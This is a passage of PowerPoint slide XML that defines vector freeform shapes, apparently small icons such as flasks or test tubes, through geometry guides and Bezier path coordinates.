            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3614" y="3556"/>
                <a:ext cx="175" cy="173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 74"/>
                  <a:gd name="T1" fmla="*/ 1 h 73"/>
                  <a:gd name="T2" fmla="*/ 1 w 74"/>
                  <a:gd name="T3" fmla="*/ 38 h 73"/>
                  <a:gd name="T4" fmla="*/ 39 w 74"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 73 w 74"/>
                  <a:gd name="T7" fmla="*/ 35 h 73"/>
                  <a:gd name="T8" fmla="*/ 36 w 74"/>
                  <a:gd name="T9" fmla="*/ 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4" h="73">
                    <a:moveTo>
                      <a:pt x="36" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="1" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="57"/>
                      <a:pt x="19" y="73"/>
                      <a:pt x="39" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="71"/>
                      <a:pt x="74" y="54"/>
                      <a:pt x="73" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="15"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="36" y="1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1" name="Freeform 2007"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3614" y="3556"/>
                <a:ext cx="175" cy="173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 74"/>
                  <a:gd name="T1" fmla="*/ 1 h 73"/>
                  <a:gd name="T2" fmla="*/ 1 w 74"/>
                  <a:gd name="T3" fmla="*/ 38 h 73"/>
                  <a:gd name="T4" fmla="*/ 39 w 74"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 73 w 74"/>
                  <a:gd name="T7" fmla="*/ 35 h 73"/>
                  <a:gd name="T8" fmla="*/ 36 w 74"/>
                  <a:gd name="T9" fmla="*/ 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4" h="73">
                    <a:moveTo>
                      <a:pt x="36" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="1" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="57"/>
                      <a:pt x="19" y="73"/>
                      <a:pt x="39" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="71"/>
                      <a:pt x="74" y="54"/>
                      <a:pt x="73" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="15"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="36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2" name="Freeform 2008"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3647" y="3823"/>
                <a:ext cx="47" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 20 w 20"/>
                  <a:gd name="T3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0" h="35">
                    <a:moveTo>
                      <a:pt x="7" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="8"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="20" y="35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3" name="Freeform 2009"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3647" y="3823"/>
                <a:ext cx="47" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 20 w 20"/>
                  <a:gd name="T3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0" h="35">
                    <a:moveTo>
                      <a:pt x="7" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="8"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="20" y="35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4" name="Freeform 2010"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3552" y="3847"/>
                <a:ext cx="44" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 36"/>
                  <a:gd name="T2" fmla="*/ 19 w 19"/>
                  <a:gd name="T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9" h="36">
                    <a:moveTo>
                      <a:pt x="7" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="9"/>
                      <a:pt x="0" y="30"/>
                      <a:pt x="19" y="36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5" name="Freeform 2011"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-3638" y="3542"/>
                <a:ext cx="244" cy="206"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 88 w 103"/>
                  <a:gd name="T1" fmla="*/ 61 h 87"/>
                  <a:gd name="T2" fmla="*/ 58 w 103"/>
                  <a:gd name="T3" fmla="*/ 7 h 87"/>
                  <a:gd name="T4" fmla="*/ 9 w 103"/>
                  <a:gd name="T5" fmla="*/ 40 h 87"/>
                  <a:gd name="T6" fmla="*/ 9 w 103"/>
                  <a:gd name="T7" fmla="*/ 40 h 87"/>
                  <a:gd name="T8" fmla="*/ 0 w 103"/>
                  <a:gd name="T9" fmla="*/ 59 h 87"/>
                  <a:gd name="T10" fmla="*/ 17 w 103"/>
                  <a:gd name="T11" fmla="*/ 61 h 87"/>
                  <a:gd name="T12" fmla="*/ 12 w 103"/>
                  <a:gd name="T13" fmla="*/ 39 h 87"/>
                  <a:gd name="T14" fmla="*/ 30 w 103"/>
                  <a:gd name="T15" fmla="*/ 26 h 87"/>
                  <a:gd name="T16" fmla="*/ 57 w 103"/>
                  <a:gd name="T17" fmla="*/ 58 h 87"/>
                  <a:gd name="T18" fmla="*/ 92 w 103"/>
                  <a:gd name="T19" fmla="*/ 76 h 87"/>
                  <a:gd name="T20" fmla="*/ 88 w 103"/>
                  <a:gd name="T21" fmla="*/ 6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3" h="87">
                    <a:moveTo>
                      <a:pt x="88" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="34"/>
                      <a:pt x="82" y="13"/>
                      <a:pt x="58" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="8" y="13"/>
                      <a:pt x="9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9" y="45"/>
                      <a:pt x="9" y="62"/>
                      <a:pt x="0" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="63"/>
                      <a:pt x="24" y="69"/>
                      <a:pt x="17" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="58"/>
                      <a:pt x="10" y="45"/>
                      <a:pt x="12" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="29"/>
                      <a:pt x="20" y="26"/>
                      <a:pt x="30" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="26"/>
                      <a:pt x="68" y="39"/>
                      <a:pt x="57" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="78"/>
                      <a:pt x="80" y="87"/>
                      <a:pt x="92" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="65"/>
                      <a:pt x="88" y="71"/>
                      <a:pt x="88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996" name="Group 2973"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5975050" y="3148407"/>
              <a:ext cx="327025" cy="309562"/>
              <a:chOff x="3154" y="3219"/>
              <a:chExt cx="1342" cy="1283"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="997" name="Freeform 2974"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3238" y="3621"/>
                <a:ext cx="1057" cy="508"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 447"/>
                  <a:gd name="T1" fmla="*/ 65 h 215"/>
                  <a:gd name="T2" fmla="*/ 6 w 447"/>
                  <a:gd name="T3" fmla="*/ 67 h 215"/>
                  <a:gd name="T4" fmla="*/ 26 w 447"/>
                  <a:gd name="T5" fmla="*/ 67 h 215"/>
                  <a:gd name="T6" fmla="*/ 33 w 447"/>
                  <a:gd name="T7" fmla="*/ 79 h 215"/>
                  <a:gd name="T8" fmla="*/ 40 w 447"/>
                  <a:gd name="T9" fmla="*/ 81 h 215"/>
                  <a:gd name="T10" fmla="*/ 67 w 447"/>
                  <a:gd name="T11" fmla="*/ 0 h 215"/>
                  <a:gd name="T12" fmla="*/ 47 w 447"/>
                  <a:gd name="T13" fmla="*/ 138 h 215"/>
                  <a:gd name="T14" fmla="*/ 74 w 447"/>
                  <a:gd name="T15" fmla="*/ 89 h 215"/>
                  <a:gd name="T16" fmla="*/ 87 w 447"/>
                  <a:gd name="T17" fmla="*/ 81 h 215"/>
                  <a:gd name="T18" fmla="*/ 117 w 447"/>
                  <a:gd name="T19" fmla="*/ 64 h 215"/>
                  <a:gd name="T20" fmla="*/ 128 w 447"/>
                  <a:gd name="T21" fmla="*/ 99 h 215"/>
                  <a:gd name="T22" fmla="*/ 192 w 447"/>
                  <a:gd name="T23" fmla="*/ 116 h 215"/>
                  <a:gd name="T24" fmla="*/ 211 w 447"/>
                  <a:gd name="T25" fmla="*/ 119 h 215"/>
                  <a:gd name="T26" fmla="*/ 216 w 447"/>
                  <a:gd name="T27" fmla="*/ 128 h 215"/>
                  <a:gd name="T28" fmla="*/ 261 w 447"/>
                  <a:gd name="T29" fmla="*/ 5 h 215"/>
                  <a:gd name="T30" fmla="*/ 218 w 447"/>
                  <a:gd name="T31" fmla="*/ 215 h 215"/>
                  <a:gd name="T32" fmla="*/ 287 w 447"/>
                  <a:gd name="T33" fmla="*/ 118 h 215"/>
                  <a:gd name="T34" fmla="*/ 296 w 447"/>
                  <a:gd name="T35" fmla="*/ 144 h 215"/>
                  <a:gd name="T36" fmla="*/ 373 w 447"/>
                  <a:gd name="T37" fmla="*/ 169 h 215"/>
                  <a:gd name="T38" fmla="*/ 392 w 447"/>
                  <a:gd name="T39" fmla="*/ 168 h 215"/>
                  <a:gd name="T40" fmla="*/ 398 w 447"/>
                  <a:gd name="T41" fmla="*/ 179 h 215"/>
                  <a:gd name="T42" fmla="*/ 430 w 447"/>
                  <a:gd name="T43" fmla="*/ 112 h 215"/>
                  <a:gd name="T44" fmla="*/ 422 w 447"/>
                  <a:gd name="T45" fmla="*/ 196 h 215"/>
                  <a:gd name="T46" fmla="*/ 447 w 447"/>
                  <a:gd name="T47" fmla="*/ 188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7" h="215">
                    <a:moveTo>
                      <a:pt x="0" y="65"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="67"/>
                      <a:pt x="6" y="67"/>
                      <a:pt x="6" y="67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33" y="79"/>
                      <a:pt x="33" y="79"/>
                      <a:pt x="33" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="81"/>
                      <a:pt x="40" y="81"/>
                      <a:pt x="40" y="81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47" y="138"/>
                      <a:pt x="47" y="138"/>
                      <a:pt x="47" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="89"/>
                      <a:pt x="74" y="89"/>
                      <a:pt x="74" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="81"/>
                      <a:pt x="87" y="81"/>
                      <a:pt x="87" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="64"/>
                      <a:pt x="117" y="64"/>
                      <a:pt x="117" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="99"/>
                      <a:pt x="128" y="99"/>
                      <a:pt x="128" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="116"/>
                      <a:pt x="192" y="116"/>
                      <a:pt x="192" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="119"/>
                      <a:pt x="211" y="119"/>
                      <a:pt x="211" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="128"/>
                      <a:pt x="216" y="128"/>
                      <a:pt x="216" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="5"/>
                      <a:pt x="261" y="5"/>
                      <a:pt x="261" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="261" y="5"/>
                      <a:pt x="216" y="211"/>
                      <a:pt x="218" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="287" y="118"/>
                      <a:pt x="287" y="118"/>
                      <a:pt x="287" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="296" y="144"/>
                      <a:pt x="296" y="144"/>
                      <a:pt x="296" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="373" y="169"/>
                      <a:pt x="373" y="169"/>
                      <a:pt x="373" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="392" y="168"/>
                      <a:pt x="392" y="168"/>
                      <a:pt x="392" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="398" y="179"/>
                      <a:pt x="398" y="179"/>
                      <a:pt x="398" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="430" y="112"/>
                      <a:pt x="430" y="112"/>
                      <a:pt x="430" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="422" y="196"/>
                      <a:pt x="422" y="196"/>
                      <a:pt x="422" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="447" y="188"/>
                      <a:pt x="447" y="188"/>
                      <a:pt x="447" y="188"/>
                    </a:cubicBezTo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8" name="Freeform 2975"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3154" y="3219"/>
                <a:ext cx="1342" cy="1283"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T1" fmla="*/ 359 h 1283"/>
                  <a:gd name="T2" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T3" fmla="*/ 1283 h 1283"/>
                  <a:gd name="T4" fmla="*/ 0 w 1342"/>
                  <a:gd name="T5" fmla="*/ 924 h 1283"/>
                  <a:gd name="T6" fmla="*/ 0 w 1342"/>
                  <a:gd name="T7" fmla="*/ 0 h 1283"/>
                  <a:gd name="T8" fmla="*/ 1342 w 1342"/>
                  <a:gd name="T9" fmla="*/ 359 h 1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2" h="1283">
                    <a:moveTo>
                      <a:pt x="1342" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1342" y="1283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1342" y="359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9" name="Freeform 2976"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3749" y="3444"/>
                <a:ext cx="156" cy="531"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 56 w 66"/>
                  <a:gd name="T1" fmla="*/ 14 h 225"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 1 h 225"/>
                  <a:gd name="T4" fmla="*/ 0 w 66"/>
                  <a:gd name="T5" fmla="*/ 9 h 225"/>
                  <a:gd name="T6" fmla="*/ 10 w 66"/>
                  <a:gd name="T7" fmla="*/ 24 h 225"/>
                  <a:gd name="T8" fmla="*/ 10 w 66"/>
                  <a:gd name="T9" fmla="*/ 190 h 225"/>
                  <a:gd name="T10" fmla="*/ 10 w 66"/>
                  <a:gd name="T11" fmla="*/ 190 h 225"/>
                  <a:gd name="T12" fmla="*/ 33 w 66"/>
                  <a:gd name="T13" fmla="*/ 222 h 225"/>
                  <a:gd name="T14" fmla="*/ 56 w 66"/>
                  <a:gd name="T15" fmla="*/ 205 h 225"/>
                  <a:gd name="T16" fmla="*/ 56 w 66"/>
                  <a:gd name="T17" fmla="*/ 37 h 225"/>
                  <a:gd name="T18" fmla="*/ 66 w 66"/>
                  <a:gd name="T19" fmla="*/ 28 h 225"/>
                  <a:gd name="T20" fmla="*/ 56 w 66"/>
                  <a:gd name="T21" fmla="*/ 14 h 225"/>
                  <a:gd name="T22" fmla="*/ 56 w 66"/>
                  <a:gd name="T23" fmla="*/ 30 h 225"/>
                  <a:gd name="T24" fmla="*/ 52 w 66"/>
                  <a:gd name="T25" fmla="*/ 29 h 225"/>
                  <a:gd name="T26" fmla="*/ 50 w 66"/>
                  <a:gd name="T27" fmla="*/ 28 h 225"/>
                  <a:gd name="T28" fmla="*/ 50 w 66"/>
                  <a:gd name="T29" fmla="*/ 117 h 225"/>
                  <a:gd name="T30" fmla="*/ 16 w 66"/>
                  <a:gd name="T31" fmla="*/ 107 h 225"/>
                  <a:gd name="T32" fmla="*/ 16 w 66"/>
                  <a:gd name="T33" fmla="*/ 18 h 225"/>
                  <a:gd name="T34" fmla="*/ 10 w 66"/>
                  <a:gd name="T35" fmla="*/ 17 h 225"/>
                  <a:gd name="T36" fmla="*/ 6 w 66"/>
                  <a:gd name="T37" fmla="*/ 11 h 225"/>
                  <a:gd name="T38" fmla="*/ 10 w 66"/>
                  <a:gd name="T39" fmla="*/ 8 h 225"/>
                  <a:gd name="T40" fmla="*/ 56 w 66"/>
                  <a:gd name="T41" fmla="*/ 21 h 225"/>
                  <a:gd name="T42" fmla="*/ 60 w 66"/>
                  <a:gd name="T43" fmla="*/ 27 h 225"/>
                  <a:gd name="T44" fmla="*/ 56 w 66"/>
                  <a:gd name="T45" fmla="*/ 3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6" h="225">
                    <a:moveTo>
                      <a:pt x="56" y="14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6" y="0"/>
                      <a:pt x="0" y="3"/>
                      <a:pt x="0" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="16"/>
                      <a:pt x="4" y="22"/>
                      <a:pt x="10" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="190"/>
                      <a:pt x="10" y="190"/>
                      <a:pt x="10" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="190"/>
                      <a:pt x="10" y="190"/>
                      <a:pt x="10" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="204"/>
                      <a:pt x="21" y="218"/>
                      <a:pt x="33" y="222"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="225"/>
                      <a:pt x="56" y="219"/>
                      <a:pt x="56" y="205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60" y="38"/>
                      <a:pt x="66" y="35"/>
                      <a:pt x="66" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="21"/>
                      <a:pt x="60" y="15"/>
                      <a:pt x="56" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="56" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="29"/>
                      <a:pt x="52" y="29"/>
                      <a:pt x="52" y="29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0" y="117"/>
                      <a:pt x="50" y="117"/>
                      <a:pt x="50" y="11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8" y="16"/>
                      <a:pt x="6" y="13"/>
                      <a:pt x="6" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="9"/>
                      <a:pt x="8" y="7"/>
                      <a:pt x="10" y="8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58" y="21"/>
                      <a:pt x="60" y="24"/>
                      <a:pt x="60" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="29"/>
                      <a:pt x="58" y="31"/>
                      <a:pt x="56" y="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00" name="Freeform 2977"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3884" y="3682"/>
                <a:ext cx="291" cy="622"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 123 w 123"/>
                  <a:gd name="T1" fmla="*/ 245 h 263"/>
                  <a:gd name="T2" fmla="*/ 82 w 123"/>
                  <a:gd name="T3" fmla="*/ 147 h 263"/>
                  <a:gd name="T4" fmla="*/ 82 w 123"/>
                  <a:gd name="T5" fmla="*/ 38 h 263"/>
                  <a:gd name="T6" fmla="*/ 92 w 123"/>
                  <a:gd name="T7" fmla="*/ 29 h 263"/>
                  <a:gd name="T8" fmla="*/ 82 w 123"/>
                  <a:gd name="T9" fmla="*/ 15 h 263"/>
                  <a:gd name="T10" fmla="*/ 37 w 123"/>
                  <a:gd name="T11" fmla="*/ 2 h 263"/>
                  <a:gd name="T12" fmla="*/ 27 w 123"/>
                  <a:gd name="T13" fmla="*/ 10 h 263"/>
                  <a:gd name="T14" fmla="*/ 37 w 123"/>
                  <a:gd name="T15" fmla="*/ 24 h 263"/>
                  <a:gd name="T16" fmla="*/ 37 w 123"/>
                  <a:gd name="T17" fmla="*/ 24 h 263"/>
                  <a:gd name="T18" fmla="*/ 37 w 123"/>
                  <a:gd name="T19" fmla="*/ 134 h 263"/>
                  <a:gd name="T20" fmla="*/ 20 w 123"/>
                  <a:gd name="T21" fmla="*/ 170 h 263"/>
                  <a:gd name="T22" fmla="*/ 5 w 123"/>
                  <a:gd name="T23" fmla="*/ 195 h 263"/>
                  <a:gd name="T24" fmla="*/ 0 w 123"/>
                  <a:gd name="T25" fmla="*/ 209 h 263"/>
                  <a:gd name="T26" fmla="*/ 18 w 123"/>
                  <a:gd name="T27" fmla="*/ 233 h 263"/>
                  <a:gd name="T28" fmla="*/ 108 w 123"/>
                  <a:gd name="T29" fmla="*/ 261 h 263"/>
                  <a:gd name="T30" fmla="*/ 123 w 123"/>
                  <a:gd name="T31" fmla="*/ 247 h 263"/>
                  <a:gd name="T32" fmla="*/ 123 w 123"/>
                  <a:gd name="T33" fmla="*/ 245 h 263"/>
                  <a:gd name="T34" fmla="*/ 37 w 123"/>
                  <a:gd name="T35" fmla="*/ 18 h 263"/>
                  <a:gd name="T36" fmla="*/ 33 w 123"/>
                  <a:gd name="T37" fmla="*/ 12 h 263"/>
                  <a:gd name="T38" fmla="*/ 37 w 123"/>
                  <a:gd name="T39" fmla="*/ 6 h 263"/>
                  <a:gd name="T40" fmla="*/ 82 w 123"/>
                  <a:gd name="T41" fmla="*/ 19 h 263"/>
                  <a:gd name="T42" fmla="*/ 86 w 123"/>
                  <a:gd name="T43" fmla="*/ 27 h 263"/>
                  <a:gd name="T44" fmla="*/ 82 w 123"/>
                  <a:gd name="T45" fmla="*/ 31 h 263"/>
                  <a:gd name="T46" fmla="*/ 80 w 123"/>
                  <a:gd name="T47" fmla="*/ 30 h 263"/>
                  <a:gd name="T48" fmla="*/ 78 w 123"/>
                  <a:gd name="T49" fmla="*/ 32 h 263"/>
                  <a:gd name="T50" fmla="*/ 78 w 123"/>
                  <a:gd name="T51" fmla="*/ 149 h 263"/>
                  <a:gd name="T52" fmla="*/ 78 w 123"/>
                  <a:gd name="T53" fmla="*/ 149 h 263"/>
                  <a:gd name="T54" fmla="*/ 80 w 123"/>
                  <a:gd name="T55" fmla="*/ 156 h 263"/>
                  <a:gd name="T56" fmla="*/ 39 w 123"/>
                  <a:gd name="T57" fmla="*/ 144 h 263"/>
                  <a:gd name="T58" fmla="*/ 43 w 123"/>
                  <a:gd name="T59" fmla="*/ 136 h 263"/>
                  <a:gd name="T60" fmla="*/ 43 w 123"/>
                  <a:gd name="T61" fmla="*/ 138 h 263"/>
                  <a:gd name="T62" fmla="*/ 43 w 123"/>
                  <a:gd name="T63" fmla="*/ 22 h 263"/>
                  <a:gd name="T64" fmla="*/ 39 w 123"/>
                  <a:gd name="T65" fmla="*/ 18 h 263"/>
                  <a:gd name="T66" fmla="*/ 37 w 123"/>
                  <a:gd name="T67" fmla="*/ 18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3" h="263">
                    <a:moveTo>
                      <a:pt x="123" y="245"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="232"/>
                      <a:pt x="86" y="158"/>
                      <a:pt x="82" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="38"/>
                      <a:pt x="82" y="38"/>
                      <a:pt x="82" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="37"/>
                      <a:pt x="92" y="34"/>
                      <a:pt x="92" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="22"/>
                      <a:pt x="88" y="16"/>
                      <a:pt x="82" y="15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1" y="0"/>
                      <a:pt x="27" y="3"/>
                      <a:pt x="27" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="15"/>
                      <a:pt x="31" y="23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134"/>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="138"/>
                      <a:pt x="27" y="154"/>
                      <a:pt x="20" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="195"/>
                      <a:pt x="5" y="195"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="202"/>
                      <a:pt x="0" y="209"/>
                      <a:pt x="0" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="221"/>
                      <a:pt x="8" y="230"/>
                      <a:pt x="18" y="233"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="261"/>
                      <a:pt x="108" y="261"/>
                      <a:pt x="108" y="261"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="263"/>
                      <a:pt x="123" y="259"/>
                      <a:pt x="123" y="247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="247"/>
                      <a:pt x="123" y="247"/>
                      <a:pt x="123" y="245"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="17"/>
                      <a:pt x="33" y="14"/>
                      <a:pt x="33" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="7"/>
                      <a:pt x="35" y="6"/>
                      <a:pt x="37" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="19"/>
                      <a:pt x="82" y="19"/>
                      <a:pt x="82" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="20"/>
                      <a:pt x="86" y="23"/>
                      <a:pt x="86" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="30"/>
                      <a:pt x="84" y="31"/>
                      <a:pt x="82" y="31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78" y="32"/>
                      <a:pt x="78" y="32"/>
                      <a:pt x="78" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="149"/>
                      <a:pt x="78" y="149"/>
                      <a:pt x="78" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="149"/>
                      <a:pt x="78" y="149"/>
                      <a:pt x="78" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="149"/>
                      <a:pt x="78" y="151"/>
                      <a:pt x="80" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
